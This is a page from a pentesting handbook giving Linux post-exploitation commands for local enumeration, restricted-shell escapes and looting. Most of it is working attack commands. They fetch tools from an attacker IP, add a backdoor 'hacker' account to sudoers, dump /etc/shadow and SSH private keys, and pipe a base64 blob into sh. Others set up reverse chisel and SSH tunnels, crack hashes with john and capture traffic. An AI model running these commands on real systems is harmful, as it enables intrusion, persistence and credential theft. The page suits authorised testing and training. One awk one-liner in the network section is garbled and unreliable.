Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
Linux

Local Enum

1
**Tools**
2
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
3
https://github.com/mbahadou/postenum/blob/master/postenum.sh
4
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
5
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
6
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
7
8
https://gtfobins.github.io/
9
10
# Spawning shell
11
python -c 'import pty; pty.spawn("/bin/bash")'
12
python -c 'import pty; pty.spawn("/bin/sh")'
13
echo os.system('/bin/bash')
14
/bin/sh -i
15
perl -e 'exec "/bin/sh";'
16
ruby: exec "/bin/sh"
17
lua: os.execute('/bin/sh')
18
(From within vi)
19
:!bash
20
:set shell=/bin/bash:shell
21
(From within nmap)
22
!sh
23
24
# Access to more binaries
25
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
26
27
# Download files from attacker
28
wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64
29
30
# Enum scripts
31
./LinEnum.sh -t -k password -r LinEnum.txt
32
./postenum.sh
33
./linpeas.sh
34
./pspy
35
36
# Common writable directories
37
/tmp
38
/var/tmp
39
/dev/shm
40
41
# Add user to sudoers
42
useradd hacker
43
passwd hacker
44
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
45
46
# sudo permissions
47
sudo -l -l
48
49
# Journalctl
50
If you can run as root, run in small window and !/bin/sh
51
52
# Crons
53
crontab -l
54
ls -alh /var/spool/cron
55
ls -al /etc/ | grep cron
56
ls -al /etc/cron*
57
cat /etc/cron*
58
cat /etc/at.allow
59
cat /etc/at.deny
60
cat /etc/cron.allow
61
cat /etc/cron.deny
62
cat /etc/crontab
63
cat /etc/anacrontab
64
cat /var/spool/cron/crontabs/root
65
cat /etc/frontal
66
cat /etc/anacron
67
systemctl list-timers --all
68
69
# Common info
70
uname -a
71
env
72
id
73
cat /proc/version
74
cat /etc/issue
75
cat /etc/passwd
76
cat /etc/group
77
cat /etc/shadow
78
cat /etc/hosts
79
80
# Users with login
81
grep -vE "nologin" /etc/passwd
82
83
# Network info
84
cat /proc/net/arp
85
cat /proc/net/fib_trie
86
cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0| 127."
87
awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) {
88
ret = ret"."hextodec(substr(str,i,2))
89
}
90
ret = ret":"hextodec(substr(str,index(str,":")+1,4))
91
return ret
92
}
93
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp
94
95
# Netstat without netstat 2
96
echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh
97
98
# Nmap without nmap
99
for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done
100
101
# Open ports without netstat
102
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
103
104
# Check ssh files:
105
cat ~/.ssh/authorized_keys
106
cat ~/.ssh/identity.pub
107
cat ~/.ssh/identity
108
cat ~/.ssh/id_rsa.pub
109
cat ~/.ssh/id_rsa
110
cat ~/.ssh/id_dsa.pub
111
cat ~/.ssh/id_dsa
112
cat /etc/ssh/ssh_config
113
cat /etc/ssh/sshd_config
114
cat /etc/ssh/ssh_host_dsa_key.pub
115
cat /etc/ssh/ssh_host_dsa_key
116
cat /etc/ssh/ssh_host_rsa_key.pub
117
cat /etc/ssh/ssh_host_rsa_key
118
cat /etc/ssh/ssh_host_key.pub
119
cat /etc/ssh/ssh_host_key
120
121
# SUID
122
find / -perm -4000 -type f 2>/dev/null
123
# ALL PERMS
124
find / -perm -777 -type f 2>/dev/null
125
# SUID for current user
126
find / perm /u=s -user `whoami` 2>/dev/null
127
find / -user root -perm -4000 -print 2>/dev/null
128
# Writables for current user/group
129
find / perm /u=w -user `whoami` 2>/dev/null
130
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
131
find / -perm /u+w -user `whoami` 2>/dev/nul
132
# Dirs with +w perms for current u/g
133
find / perm /u=w -type -d -user `whoami` 2>/dev/null
134
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
135
136
# Port Forwarding
137
# Chisel
138
# Victim server:
139
chisel server --auth "test:123" -p 443 --reverse
140
# In host attacker machine:
141
./chisel client --auth "test:123" 10.10.10.10:443 R:socks
142
143
# Dynamic Port Forwarding:
144
# Attacker machine:
145
ssh -D 9050 [email protected]
146
# Attacker machine Burp Proxy - SOCKS Proxy:
147
Mark “Override User Options”
148
Mark Use Socks Proxy:
149
SOCKS host:127.0.0.1
150
SOCKS port:9050
151
152
# Tunneling
153
Target must have SSH running for there service
154
1. Create SSH Tunnel: ssh -D localhost: -f -N [email protected] -p
155
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
156
3. Add the following line into the config: Socks5 127.0.0.1
157
4. Run commands through the tunnel: proxychains
158
159
# SShuttle
160
# https://github.com/sshuttle/sshuttle
161
sshuttle -r [email protected] 10.2.2.0/24
162
163
# netsh port forwarding
164
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
165
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
Copied!

Escaping restricted shell

1
# First check your shell
2
echo $SHELL
3
# and commands
4
export
5
6
# vim
7
# List files
8
:!/bin/ls -l .b*
9
# Set new shell
10
:set shell=/bin/sh
11
:shell
12
# or
13
:!/bin/sh
14
15
# ed
16
!'/bin/sh'
17
18
# ne -> Load Prefs -> Navigate everywhere
19
20
# more/less/man/pinfo
21
!'sh'
22
23
# links -> File OS Shell
24
# lynx -> "o" for options -> configure default editor e.g. vim
25
lynx --editor=/usr/bin/vim www.google.com
26
# or
27
export EDITOR=/usr/bin/vim
28
# navigate to https://translate.google.com/ go to text box, ENTER and F4
29
30
# mutt
31
!
32
33
# find
34
find / -name "root" -exec /bin/sh \;
35
find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
36
37
# nmap < 2009/05
38
--interactive
39
!sh
40
41
# awk
42
awk 'BEGIN {system("/bin/sh")}'
43
44
# expect
45
expect -c 'spawn sh' -i
46
47
# python
48
python -c 'import pty; pty.spawn("/bin/sh")'
49
50
# ruby irb
51
exec '/bin/sh'
52
53
# perl
54
perl -e 'system("sh -i");'
55
perl -e 'exec("sh -i");'
56
57
# php -a
58
exec("sh -i");
59
60
# Only Rbash
61
echo x | xargs -Iy sh -c 'exec sh 0<&1'
62
63
# Emacs
64
Mod-!
65
/bin/sh
66
67
# cp
68
cp /bin/sh /dev/shm/sh; /dev/shm/sh
69
70
# export
71
export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH
72
73
# FTP/Telnet
74
!/bin/sh
75
76
# GDB
77
!/bin/sh
78
79
# eval
80
eval echo echo {o..q}ython\;
81
82
# tee
83
echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc'
84
85
# declare
86
declare -n PATH; export PATH=/bin;bash -i
87
BASH_CMDS[shell]=/bin/bash;shell -i
88
89
# nano
90
nano -s /bin/sh
91
# Ctrl+T
92
93
# SSH
94
ssh [email protected] -t "bash --noprofile -i"
95
ssh [email protected] -t "() { :; }; sh -i "
Copied!

Loot

1
# Linux
2
cat /etc/passwd
3
cat /etc/shadow
4
unshadow passwd shadow > unshadowed.txt
5
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
6
7
ifconfig -a
8
arp -a
9
10
tcpdump -i any -s0 -w capture.pcap
11
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
12
tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111
13
14
.bash_history
15
16
/var/mail
17
/var/spool/mail
18
19
echo $DESKTOP_SESSION
20
echo $XDG_CURRENT_DESKTOP
21
echo $GDMSESSION
Copied!
Exploitation - Previous
File transfer
Next - Post Exploitation
Pivoting
Last modified 1yr ago
Export as PDF
Copy link
Edit on GitHub
Contents
Local Enum
Escaping restricted shell
Loot